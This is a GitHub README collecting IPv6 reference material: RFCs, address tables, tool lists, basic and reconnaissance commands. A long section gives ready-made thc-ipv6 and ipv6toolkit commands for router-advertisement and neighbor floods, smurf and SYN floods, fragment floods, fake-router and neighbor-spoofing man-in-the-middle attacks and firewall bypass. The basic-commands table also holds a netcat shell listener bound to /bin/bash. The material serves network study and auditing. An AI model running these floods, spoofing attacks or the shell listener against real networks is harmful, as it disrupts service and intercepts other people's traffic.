Skip to content

zbetcheckin/IPv6

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
README.md
README.md
 
 
cheat_sheet_estoile.pdf
cheat_sheet_estoile.pdf
 
 
cheat_sheet_roesen.pdf
cheat_sheet_roesen.pdf
 
 

Repository files navigation

IPv6

Playing with IPv6 for fun and profit
Inspired by @FernandoGont, @fegoffinet and @bortzmeyer
I have also passed the IPv6 Hurrican Electric Certifications with the sage level, it was very fun and educational, I recommend it : https://ipv6.he.net/certification/

RFCs

Name URL
Internet Protocol Version 6 https://www.rfc-editor.org/rfc/rfc2460.txt
IPv6 Addressing Architecture https://www.rfc-editor.org/rfc/rfc4291.txt
Neighbor Discovery for IPv6 https://www.rfc-editor.org/rfc/rfc4861.txt
Rogue IPv6 Router Advertisement https://www.rfc-editor.org/rfc/rfc6104.txt
Neighbor Discovery Problems https://www.rfc-editor.org/rfc/rfc6583.txt
Network Reconnaissance in IPv6 https://www.rfc-editor.org/rfc/rfc7707.txt
RFCs related to IPv6 http://ipv6now.com.au/RFC.php

IPv4/IPv6 Comparison

Setting IPv4 IPv6
Address 32 bits 128 bits
Neighbor Discovery ARP NDP, ICMPv6
Auto configuration ICMP & DHCP ICMPv6 & DHCPv6 (optional)
Packet transmition Broadcast / Multicast Multicast
ICMP ICMPv4  ICMPv6
Fragmentation  Both in hosts and routers Only in hosts
Local network 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16 ULA fc00::/7, fd00::/8
Headers Comparison 1 Options Extensions
Headers Comparison 2 Next Header Protocol
Headers Comparison 3 Hop Limit Time to Live
Loopback address 127.0.0.1 ::1

IPv6 Specifications

Address type Binary prefix IPv6 notation
Unspecified 00...0 (128 bits) ::/128
Loopback 00...1 (128 bits) ::1/128
Multicast 11111111 ff00::/8
Link-local unicast 1111111010 fe80::/64
Site-local unicast 1111111011 fec0::/10
Global unicast everything else everything else
Unique local address (ULA) 1111 110L FC00::7
  • Each computer get a public IP
  • Local automatic addressing
  • Global Autoconfiguration and/or DHCPv6
  • No more need of "NAT"
  • No more "Header Checksum" IHL fields
  • Fragmentation function removed from routers
  • DHCPv6-PD, IPAM solutions
  • "Flow Label" is new : Used by a source to label sequences of packets for which it requests special handling by the IPv6 routers

Subnet calculator

Name URL
Subnetonline http://www.subnetonline.com/pages/subnet-calculators.php
Subnet Calculator in Python https://github.com/aipi/IPv6-subnet-calculator

IPv6 Certifications 🎓

Name URL
Hurricane Electric https://ipv6.he.net/certification/
NIC.br (PT-BR) http://saladeaula.nic.br/courses/course-v1:NIC.br+IPV6-001+T001/about
IPv6 Laboratory (PT-BR) http://ipv6.br/pagina/livro-ipv6/

Cheat sheets

Cheat sheet estoile
Cheat sheet roesen

Tools 🔧

Name URL
thc-ipv6 https://github.com/vanhauser-thc/thc-ipv6 👍
ipv6-toolkit https://github.com/fgont/ipv6toolkit 👍
Scapy http://www.secdev.org/projects/scapy/
Chiron http://www.secfu.net/tools-scripts/
Scanners Nmap / Metasploit / Scan6 / Halfscan6
Evil foca http://www.informatica64.com/
Firewall tester https://github.com/timsgit/ipscan
Scan detective https://github.com/regulatre/ipv6-scan-detective
Rogue IPv6 router detector https://github.com/xme/rrhunter
Neighbor discovery protocol monitor https://packages.debian.org/jessie/ndpmon
Netcat6 https://packages.debian.org/source/jessie/amd64/nc6
Diagnostic tools https://packages.debian.org/jessie/ndisc6
IPv6 addresses calculator https://packages.debian.org/jessie/ipv6calc
Online scanner http://www.ipv6scanner.com/
Online scanner http://www.subnetonline.com/pages/ipv6-network-tools/online-ipv6-port-scanner.php
Online utilities https://centralops.net/

IPv6 basic network commands

Action Command
Address ping $ ping6 -I eth0 IPv6ADDR
Connections $ netstat -A inet6
Determining address type $ addr6 -a IPv6ADDR
Display neighbor cache $ ip -6 neigh show
DNS lookup $ host DOMAIN
Domain ping $ ping6 -I eth0 DOMAIN
Flush neighbor cache $ ip -6 neigh flush
Identifying the Flow ID generation policy $ sudo ./flow6 -i eth0 -v --flow-label-policy -d IPv6ADDR
IP show $ ip -6 addr or `$ sudo ifconfig
IPtables $ sudo ip6tables -L -v --line-numbers
NETCAT Listen $ nc6 -lp 12345 -v -e "/bin/bash" & Connect $ nc6 localhost 12345
Numerical address in URL needs brackets http://[IPv6]/ or with a port http://[IPv6]/:80
Routes $ ip -6 route or $ netstat -rnA inet6 or $ sudo route -A inet6
SSH $ ssh -6 user@IPv6ADDR%eth0
TCPDUMP $ sudo tcpdump -i eth0 -evv ip6 or proto ipv6
TELNET $ telnet IPv6ADDR PORT
Traceroute $ traceroute6 DOMAIN
Traceroute EH-enabled $ sudo ./path6 -v -u 72 -d DOMAIN
Traceroute with MTR $ mtr -6 DOMAIN
Trace the path to discover the MTU $ tracepath6 DOMAIN

IPv6 network discovery

Action Command
Listening for neighbor solitication passively $ sudo ./passive_discovery6 eth0
Duplicate Address Detection $ sudo ./detect-new-ip6 eth0
ICMPv6 Router Discovery $ rdisc6 eth0 👍
Local scan $ sudo ./scan6 -i eth0 --local-scan --rand-src-addr --verbose # Link-local & Global addresses 👍
Send ICMPv6 echo-request $ ping6 ff02::1%eth0 (all nodes address - RFC4291) 👍
Send ICMPv6 echo-request $ ping6 ff02::2%eth0 (all routers address - RFC4291) 👍
Find activities on local network $ sudo ./alive6 eth0 -v # Detect ICMPv6 echo-reply on global addresses
Discover global & MAC addresses $ sudo ./scan6 -i eth0 -L -e --print-type global
Get IPv6 from a MAC addresses $ sudo ./inverse_lookup6 eth0 MACADDR
Action Command
Nmap scan $ nmap -6 -sT DOMAIN # ::1 for localhost
Domain scanning $ sudo ./scan6 -v -i eth0 -­d DOMAIN/64
Address scanning $ sudo ./scan6 -v -i eth0 -­d IPv6ADDR/64
Metasploit msf > search type:auxiliary ipv6

DNS - AS

Action Command
DNS lookup $ nslookup -query=AAAA DOMAIN
DNS lookup $ host -t AAAA DOMAIN
DNS lookup $ dig -6 AAAA DOMAIN
Reverse lookup $ dig -x IPv6ADDR
DNS enumeration $ ./dnsdict6 -d DOMAIN 👍
DNS enumeration (PTR request) $ ./dnsrevenum6 DNSSERVER IPv6ADDR/64
DNS lookup with a domain list `$ cat domainsList.txt
DNS enumeration $ sudo script6 get-bruteforce-aaaa DOMAIN
AS-related info $ sudo script6 get­-as IPv6ADDR
AS-related info $ sudo script6 get­-asn IPv6ADDR
Google DNS IPv4 : 8.8.4.4, 8.8.8.8
IPv6 : 2001:4860:4860::8888, 2001:4860:4860::8844
IPv6 rDNS Nameservers http://bgp.he.net/ipv6-progress-report.cgi?section=ipv6_rdns

Internet access test 👷

Using ping

GNU/Linux

$ ping6 ipv6.google.com

Windows:

C:\Users\test>ping ipv6.google.com

Using traceroute

GNU/Linux

$ traceroute6 ipv6.google.com

Using a browser

Name URL
Kame http://www.kame.net/ 👍 Dance with the 🐢
Google test https://ipv6test.google.com/
ipv6now http://ipv6now.com.au/tools.php
ipv6-test http://ipv6-test.com/
test-ipv6 http://test-ipv6.com/
testmyipv6 http://v6.testmyipv6.com/
whatismyv6 http://whatismyv6.com/
webdnstools http://www.webdnstools.com/dnstools/dns-lookup-ipv6
Speed test http://www.speedtest6.com/
Speed test http://ipv6-speedtest.net/
Firewall tester http://www6.chappell-family.co.uk/ (https://github.com/timsgit/ipscan)
Hurricane Electric https://ipv6.he.net/certification/

Search for IPv6 addresses & domains 🎯

Name URL
BGP Toolkit http://bgp.he.net/ 👍
BGP IPv6 progress report http://bgp.he.net/ipv6-progress-report.cgi
DNS A domain analysis could reveal IPv6 addresses (AAAA & PTR records)
SSL An SSL analysis could reveal IPv6 addresses too
IPv4 - IPv6 Search for dual stacked host
Google dorks site:ipv6.*
Recent websites validated http://ipv6-test.com/validate.php
Recent websites added http://sixy.ch/
Shodan https://www.shodan.io/
IPv6 map's project https://mrlooquer.com/
Dual Stack Chart http://ipv6eyechart.ripe.net/

Investigation on IPv6 addresses & domains 🔍

Name URL
BGP Toolkit http://bgp.he.net/ 👍
TCP utils http://www.tcpiputils.com/
Ultra tools https://www.ultratools.com/tools/asnInfo
IP research https://whatismyipaddress.com/
Black list https://mxtoolbox.com/blacklists.aspx
extract_hosts6.sh https://github.com/vanhauser-thc/thc-ipv6/blob/master/extract_hosts6.sh
extract_networks6.sh https://github.com/vanhauser-thc/thc-ipv6/blob/master/extract_networks6.sh

grep on IPv6

... | grep -E --color "(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))"

Other IPv6 filters # man addr6

$ cat file.txt | addr6 -i -s

Scapy

@antoniosatlasis did some nice scapy scripts during this workshop (starting on page 184) :
https://www.ernw.de/download/Advanced Attack Techniques against IPv6 Networks-final.pdf
To be continued

IPv6 hosting 🏢

Name URL
Hosting providers https://www.sixxs.net/wiki/IPv6_Enabled_Hosting
Hosting providers http://www.fix6.net/ipv6-webhosting/
VPS https://www.sixxs.net/wiki/IPv6_Enabled_VPS_Hosting

Misc

Name URL
Wireshark https://wiki.wireshark.org/IPv6
IPv6 attack detector https://github.com/mzweilin/ipv6-attack-detector/ & https://www.honeynet.org/node/944

Vulnerabilities and attacks 🔓

Monitoring new related IPv6 vulnerabilites : https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=ipv6

Most of the following vulnerabilities and attacks come from @FernandoGont

Denial of Services

  • Router Advertisement
  • Router lifetime 0
  • Neighbor Advertisement
  • Neighbor Solicitation
  • TooBig error messages
  • TCP SYN
  • Smurf attack
  • Fragments management
  • DAD (Duplicate Address Detection)
  • Buffer / Connections
  • Other denial of services

Audit / Bypass

  • Firewall audit & Filter bypass tests
  • IPv6 implementation test

MITM

  • Router Advertisement MITM
  • Neighbor Solitication Interceptor

Fragmentations

  • Predictable fragment ID identification values
  • Atomic fragments
  • Fragment reassembly policy
  • Fragment firewall and implementation tests

Others

  • Advertise a malicious Current Hop Limit
  • Advertise a malicious MTU
  • Disable an Existing Router
  • BlackHole

Denial of Services :trollface:

Router Advertisement 👍

Flood the local network with router advertisements. Many OS do not have an upper limit to the number of network a machine can belong to. All their resources can be consumed trying to join thousands of fake IPv6 networks.
$ sudo ./flood_router26 eth0

Router lifetime 0

Router Advertisement with Router Lifetime set to 0. It announce to 'ff02:1' that a router is going down to delete it from the routing tables. '*' as router-address will sniff the network for RAs and immediately send a kill packet.
$ sudo ./kill_router6 eth0 ROUTERADDR

Neighbor Advertisement

Flood the local network with neighbor advertisements. The performance on IPv6 host neighbor tables will degrade and cause a DoS.
$ sudo ./flood_advertise6 eth0 TARGETIPv6ADDR
$ sudo ./na6 -i eth0 --target TARGETIPv6ADDR --dst-address ff02::1 --override -E 1:2:3:4:5:6 --loop --verbose

Neighbor Solicitation 👍

Flood the network with neighbor solicitations. If no target is supplied, query address will be 'ff02::1'.
$ sudo ./flood_solicitate6 eth0 TARGETIPv6ADDR

TooBig error messages

Flood the target /64 network with ICMPv6 TooBig error messages.
Perform NDP Exhaustion attacks with ICMPv6 TooBig and EchoRequest (Fortinet & Cisco sensitive from Fernando Gont test)
$ sudo ./ndpexhaust26 -c -r -p eth0 TARGETIPv6ADDR

TCP SYN

Flood the target with TCP-SYN packets. Destination port can be randomized if you supply "x" as port.
$ sudo ./thcsyn6 eth0 TARGETIPv6ADDR DSTPORT # 'thcsyn6 -h' have interesting options
$ sudo ./tcp6 -i eth0 --src-address SRCIPv6ADDR --dst-address TARGETIPv6ADDR --dst-port DSTPORT --tcp-flags S --flood-sources 100 --loop --sleep 1 --verbose

Smurf attack

Flood the target with network traffic amplification. Send ICMPv6 echo requests to 'FF02::1' with the spoofed source from the attack target.
$ sudo ./smurf6 eth0 TARGETIPv6ADDR

Fragments management

Flood the reassembly table with imcomplete fragment packets. Only working with poor fragment reassembly queue management.
$ sudo ./frag6 -i eth0 --flood-frags 10000 --loop --dst-address TARGETIPv6ADDR --verbose
$ sudo ./frag6 -i eth0 --flood-frags 100 --loop --src-address ::/0 --dst-address TARGETIPv6ADDR --verbose

DAD (Duplicate Address Detection)

DAD is the mechanism of IPv6 stateless autoconfiguration to detect whether an IPv6 address exists on the network. Every time a new computer asks about IPv6 existence, the attacker replies and claims that he is that IPv6. The new computer cannot join the network since it does not have IPv6 address. It use ICMPv6 neighbor solicitation which sends to all nodes multicast address.
$ sudo ./na6 -i eth0 --accept-src ::/128 --solicited --override --listen --verbose
$ sudo ./dos-new-ip6 eth0

Buffer / Connections

A buffer/connections flood can be done by TCP-SYN with no controlling process and will make a lots of queue data for such connections.
$ sudo ./tcp6 -i eth0 --dst-address TARGETIPv6ADDR --dst-port 80 --listen --src-address TARGETIPv6ADDR/112 --flood-ports 10 --loop --rate-limit 100pps --data "GET / HTTP/1.0\r\n\r\n" --close-mode LAST-ACK

Other denial of services

The tools 'denial6' allow to performs various denial of services attacks.
$ sudo ./denial6 eth0 TARGETIPv6ADDR CASENUMBER
Case number :
1 : large hop-by-hop header with router-alert and filled with unknown options
2 : large destination header filled with unknown options
3 : hop-by-hop header with router alert option plus 180 headers
4 : hop-by-hop header with router alert option plus 178 headers + ping
5 : AH header + ping
6 : first fragments of a ping with a hop-by-hop header with router alert
7 : large hop-by-hop header filled with unknown options (no router alert)

Audit & Bypass

Firewall audit & Filter bypass tests

Performs various access control & bypass attempts to check implementations.
$ sudo ./firewall6 -H eth0 TARGETIPv6ADDR DSTPORT # Option '-u' for UDP

IPv6 implementation test

Tests various IPv6 specific options for their implementations. It can also be used to test firewalls.
$ sudo ./implementation6 eth0 TARGETIPv6ADDR

MITM

Router Advertisement MITM 👍

Announce yourself as a router and become the default router.
$ sudo ./fake_router26 eth0 # 'fake_router26 -h' have many interesting options

Neighbor Solitication Interceptor

This redirect all local traffic to you by answering falsely to Neighbor Solitication requests.
$ sudo ./na6 -i eth0 --accept-target TARGETIPv6ADDR --listen -E 11::33:44:55:66 --solicited --override --verbose
$ sudo ./parasite6 -l eth0

Fragmentations

#### Predictable fragment ID identification values Predictable Identification values result in an information leakage that can be exploited in a number of ways like to perform a Idle-scan, DoS attacks (fragment ID collisions), uncover the rules of a number of firewalls or count the number of systems behind a middle-box for example.
$ sudo ./frag6 -i eth0 --frag-id-policy --dst-address TARGETIPv6ADDR --verbose

Atomic fragments

Atomic fragments are IPv6 packets which are not fragmented but still contain a (redundant) Fragment Header. IPv6 packets that contain a Fragment Header with the Fragment Offset set to 0 and the M flag set to 0. If atomic fragments overlap both of the other ones, all of them can be discarded.
$ sudo ./frag6 -i eth0 --frag-type atomic --frag-id 100 --dst-address TARGETIPv6ADDR --verbose

Fragment reassembly policy

Assess fragment reassembly policy.
$ sudo ./frag6 -i eth0 -v --frag-reass-policy --dst-address TARGETIPv6ADDR --verbose

Fragment firewall and implementation tests

The tools fragmentation6 can performs a fragment firewall and implementation checks.
$ sudo ./fragmentation6 eth0 TARGETIPv6ADDR

Others

Advertise a malicious Current Hop Limit

Advertise a malicious Current Hop Limit such that packets are discarded by the intervening routers.
$ sudo ./ra6 -i eth0 --src-address ROUTERADDR --dst-address TARGETIPv6ADDR --curhop HOPS --loop 1 --verbose

Advertise a malicious MTU

Advertise a small Current Hop Limit such that packets are discarded by the intervening routers.
$ sudo ./ra6 -i eth0 --src-address ROUTERADDR --dst-address TARGETIPv6ADDR -M MTU --loop 1 --verbose

Disable an Existing Router

Impersonate the local router and send a Router Advertisement with a "Router Lifetime" small value. The victim host will remove the router from the 'default routers list'.
$ sudo ./ra6 -i eth0 --src-address ROUTERADDR --dst-address TARGETIPv6ADDR --lifetime 0 --loop 1 --verbose

BlackHole

Search for a black hole can be useful to find out who is dropping specific packets, network reconnaissance or just checking if you EH-enabled attacks would work.

Tools : blackhole6, scan6

Not tested yet. Related RFC : https://tools.ietf.org/html/rfc6666

TO BE CONTINUED

Statistics 📈

Name URL
NRO https://www.nro.net/statistics
Ripe https://www.ripe.net/publications/ipv6-info-centre
Google https://www.google.com/intl/en/ipv6/statistics.html
Cisco http://6lab.cisco.com/stats/
World IPv6 Launch http://www.worldipv6launch.org/measurements/
M.R.P. http://www.mrp.net/ipv6_survey/
Top Alexa by country https://www.vyncke.org/ipv6status/

## Sources ℹ️

About

Playing with IPv6 for fun and profit

Resources

Readme
Activity

Stars

116 stars

Watchers

8 watching

Forks

36 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •